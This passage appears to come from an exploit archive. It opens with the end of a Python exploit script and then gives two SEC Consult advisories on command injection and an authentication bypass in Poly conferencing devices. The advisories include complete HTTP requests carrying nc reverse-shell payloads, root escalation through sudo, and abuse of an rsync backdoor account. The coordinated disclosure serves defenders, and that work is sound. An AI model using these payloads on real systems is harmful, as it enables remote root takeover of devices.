"w") as f:<br /> for result in paramResults:<br /> f.write("%s\n" % result)<br /> f.close()<br /><br />if __name__ == "__main__":<br /> parser = optparse.OptionParser()<br /><br /> parser.add_option('-u', '--url', action="store", dest="url", help='Base target uri (ex. http://target-uri/)')<br /> parser.add_option('-f', '--file', dest="filehosts", help='example.txt')<br /> parser.add_option('-t', '--threads', dest="threads_set", type=int,default=10)<br /> parser.add_option('-m', '--maxtimeout', dest="timeout", type=int,default=8)<br /> parser.add_option('-o', '--output', dest="output", type=str, default='exploit_result.txt')<br /> parser.add_option('-c', '--cmd', dest="command", type=str, default='id')<br /> optionsOpt, args = parser.parse_args()<br /><br /> main()<br /> <br /> <br /> <br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220601-1 ><br />=======================================================================<br /> title: Authenticated Command Injection<br /> product: Poly Studio X30, Studio X50, Studio X70, G7500<br /> vulnerable version: 3.4.0-292042, 3.5.0-344025, 3.6.0<br /> fixed version: 3.7.0 or higher<br /> CVE number: CVE-2022-26481<br /> impact: critical<br /> homepage: https://www.poly.com<br /> found: 2021-07-14<br /> by: Johannes Kruchem (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Experience full board-room-quality audio, and knock-your-socks-off video,<br />for mid-sized rooms. The Poly Studio X50 all-in-one video bar is radically<br />simple to use with support for leading cloud video services built right<br />in—no PC or Mac required. Voices are crisp and clear. Video feels natural.<br />And wireless content sharing lets users collaborate from their devices<br />without cables or pucks."<br /><br />https://www.poly.com/us/en/products/video-conferencing/studio/studio-x50<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patch which should be installed immediately.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Authenticated Command Injection with Elevated Privileges (CVE-2022-26481)<br />An authenticated Command Injection vulnerability exists in the web interface when<br />creating a certificate. An attacker is able to execute commands with root privileges.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Authenticated Command Injection with Elevated Privileges (CVE-2022-26481)<br />When being authenticated:<br /><br />1. In the system web interface, go to Security > Certificates.<br />2. Select Create Certificate Signing Request (CSR).<br />3. In the Certificate Details form, complete the following fields:<br /><br />Common Name (CN): $(busybox nc 10.0.0.1 8888 -e /system/bin/sh)<br /><br />(steps taken from https://documents.polycom.com/bundle/polypartnermode-ag-3-1-1/page/t1919784.html)<br /><br />The previously started nc listener receives a connection from the camera<br />as root:<br /><br />$ nc -lvp 8888<br />connect to [10.0.0.1] from (UNKNOWN) [10.0.0.2]<br />$ pwd<br />/oem/polycom/bin<br />$ whoami<br />root<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />At least the following firmware versions of Poly Studio X30, Studio X50, Studio X70 and<br />G7500 are affected:<br /><br />- 3.4.0<br />- 3.5.0<br />- 3.6.0<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2021-07-14: Contacting vendor through PSIRT email.<br />2021-07-15: Vendor sent PGP key.<br />2021-07-16: Advisory was sent to the vendor.<br />2021-07 to 2022-03: Further coordination with multiple emails and meetings.<br />2022-03-18: Vendor provides draft advisory.<br />2022-03 - 2022-06: Patch already available, waiting for vendor advisory release.<br />2022-06-01: Coordinated release of security advisory.<br /><br /><br />Solution:<br />---------<br />Update to firmware version 3.7.0 or higher.<br /><br />The firmware can be downloaded from the vendor's support page:<br />https://www.poly.com/us/en/support/products<br /><br /><br />This issue has been documented in the vendor's security advisory PLYTV21-09:<br />https://www.poly.com/content/dam/www/products/support/global/security/2022/PLYTV21-09_Studio-X50-Improper-Neutralization-of-Special-Elements-used-in-an-OS-Command.pdf<br /><br /><br />Workaround:<br />-----------<br />In order to minimize the risk of exploitation, set a strong password for the<br />web interface and restrict network access to the device.<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Johannes Kruchem / @2022<br /><br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220601-0 ><br />=======================================================================<br /> title: Multiple Critical Vulnerabilities<br /> product: Poly EagleEye Director II<br /> vulnerable version: 2.2.1.1 (Jul 1, 2021)<br /> fixed version: 2.2.2.1 or higher<br /> CVE number: CVE-2022-26479, CVE-2022-26482<br /> impact: critical<br /> homepage: https://www.poly.com<br /> found: 2021-07-14<br /> by: Johannes Kruchem (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Why settle for a one-size-fits-all view of your conference room?<br />EagleEye Director II takes video conferencing and conference room web<br />cameras to the next level—with people-tracking technology and automatic zoom.<br />You’ll find that when people aren’t worrying about staying in camera view or<br />how to work a remote control, they stay focused on the bigger issue—solving<br />critical business problems."<br /><br />Source: https://www.poly.com/us/en/products/video-conferencing/studio/studio-x50<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patch which should be installed immediately.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Multiple Authenticated Command Injection Vulnerabilities (CVE-2022-26482)<br />When logged on to the administration web interface, command injection payloads<br />can be inserted in at least four different fields. This happens because the<br />user input is not escaped and gets concatenated with a string which is executed<br />afterwards with "os.system()". The webserver was started as "www-data" who<br />has sudo privileges.<br /><br />2) Authentication Bypass (CVE-2022-26479)<br />The authentication can be bypassed by creating a specific file on the file system.<br />If this file is created, every API call is executed as admin with no further<br />authentication (sessionid). This behavior could not be found in any<br />documentation. The creation of this file was possible with rsync for which a<br />backdoor account was found. The rsync daemon runs on port 873 and provides the<br />modules "/flag" and "/update".<br /><br /><br />The combination of 1) and 2) leads to an privileged unauthenticated OS command<br />injection.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Multiple Authenticated Command Injection Vulnerabilities (CVE-2022-26482)<br />When logged into the web interface, the name of the device can be changed in<br />the settings. A command can be injected with $(<command>) in the name. To<br />bypass the length-limit the payload can be changed in the POST request, which<br />looks as follows:<br />-------------------------------------------------------------------------------<br />POST /api/deviceName HTTP/1.1<br />Host: 10.0.0.3<br />Cookie: sessionid=ovizy1tgavf9ipd2ha1g6zu379oopqcn; language=StringResource.de-DE<br />Connection: close<br /><br />{"deviceName":"EEDII-Master $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.0.0.5 8888 >/tmp/f)"}<br />-------------------------------------------------------------------------------<br /><br />It looks as follows on the host system, where an nc listener was started:<br /><br />$ nc -lvp 8888<br />connect to [10.0.0.5] from (UNKNOWN) [10.0.0.3]<br />$ whoami<br />www-data<br /><br />Sudo allowed executing commands as root:<br /><br />$ sudo whoami<br />root<br /><br /><br />Also the following request results in command execution. This request was not<br />intercepted but reconstructed from the source code of the application.<br />-------------------------------------------------------------------------------<br />POST /api/region HTTP/1.1<br />Host: 10.0.0.3<br />Cookie: sessionid=ovizy1tgavf9ipd2ha1g6zu379oopqcn; language=StringResource.de-DE<br />Content-Length: 45<br /><br />{"region":"$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.0.0.5 9999 >/tmp/f)"}<br />-------------------------------------------------------------------------------<br /><br />When enabling 802.1X, one can see that the payload "sudo sh" works as well. In<br />this case an attacker is root immediately:<br />-------------------------------------------------------------------------------<br />POST /api/ethernetSettings HTTP/1.1<br />Host: 10.0.0.3<br />Cookie: language=StringResource.de-DE; sessionid=l5qvshh7h5p4y1ve37opkzwx0fk6xy4h<br />Content-Length: 83<br /><br />{"s8021X":"enabled","identity":"$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sudo sh -i 2>&1|nc 10.0.0.5 7777 >/tmp/f)","password":"asd"}<br />-------------------------------------------------------------------------------<br /><br />When generating a certificate, the following payload can be injected to execute<br />a reverse shell:<br />-------------------------------------------------------------------------------<br />POST /api/certificate HTTP/1.1<br />Host: 10.0.0.3<br />Cookie: language=StringResource.de-DE; sessionid=vxxs25a2mcn5xz4ndjao9noogpqc7yy2<br />Connection: close<br /><br />{"name":"EagleEyeDirectorII.polycom.com\n","country":"US","province":"California","city":"San Jose",<br />"organization":"Polycom Inc. \":\"$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sudo sh -i 2>&1|nc 10.0.0.5 7777 >/tmp/f)",<br />"organizationUnit":"Video Division"}<br />-------------------------------------------------------------------------------<br /><br /><br />2) Authentication Bypass (CVE-2022-26479)<br />Step 1 - Find the rsync backdoor account<br />The rsync modules "/flag" and "/update" are configured to require<br />authentication. In the rsync config file "/etc/rsyncd.conf" the file<br />"/etc/rsyncd.scrt" was set as secrets file which contains the following<br />"user:password" in plain text. This user was not found in any documentation:<br /><br />visage:<PoC removed><br /><br />Step 2 - Find the authentication bypass<br />The source code in "/www/DjangoTest/TestApp/api2.py" contains the following<br />code snippet:<br />-------------------------------------------------------------------------------<br />def checkCookie(request):<br /> <snipped><br /> filename = "/data/local/tmp/runAutomationFlag"<br /> if (os.path.exists(filename)):<br /> logger.info("run automation, do not check cookie")<br /> return "success"<br /> else:<br /> <snipped><br />-------------------------------------------------------------------------------<br /><br />If the file "runAutomationFlag" exists in "/data/local/tmp", the cookie is not<br />going to be checked anymore. Coincidentally, the rsync module "/flag" is<br />configured for the path "/data/local" so a "/tmp" needs to be attached. To<br />exploit this authentication bypass the runAutomationFlag file can be copied to<br />the remote path as follows:<br /><br />$ touch runAutomationFlag<br />$ rsync -av ./runAutomationFlag rsync://visage@10.0.0.3:873/flag/tmp<br />Password<br />sending incremental file list<br />runAutomationFlag<br /><br /><br />Now the file is in the specific location:<br /><br />$ pwd<br />/data/local/tmp<br />$ ls<br />rebootcnt.txt<br />runAutomationFlag<br /><br />The payloads from 1) can now be sent unauthenticated since the cookies are not<br />checked anymore. This behavior is not documented.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />Version 2.2.1.1 (Jul 1, 2021) was found to be vulnerable.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2021-07-14: Contacting vendor through PSIRT email.<br />2021-07-15: Vendor sent PGP key.<br />2021-07-16: Advisory was sent to the vendor.<br />2021-07 to 2022-03: Further coordination with multiple emails and meetings.<br />2022-03-18: Vendor provides draft advisory.<br />2022-03 - 2022-06: Patch already available, waiting for vendor advisory release.<br />2022-06-01: Coordinated release of security advisory.<br /><br /><br />Solution:<br />---------<br />Update to firmware version 2.2.2.1 or higher.<br /><br />The firmware can be downloaded from the vendor's support page:<br />https://www.poly.com/us/en/support/products<br /><br />This issue has been documented in the vendor's security advisory PLYPL21-12:<br />https://www.poly.com/content/dam/www/products/support/global/security/2022/PLYPL21-12_EEDII-Multiple-Security-Vulnerabilities.pdf<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Johannes Kruchem / @2022<br /><br /></code></pre>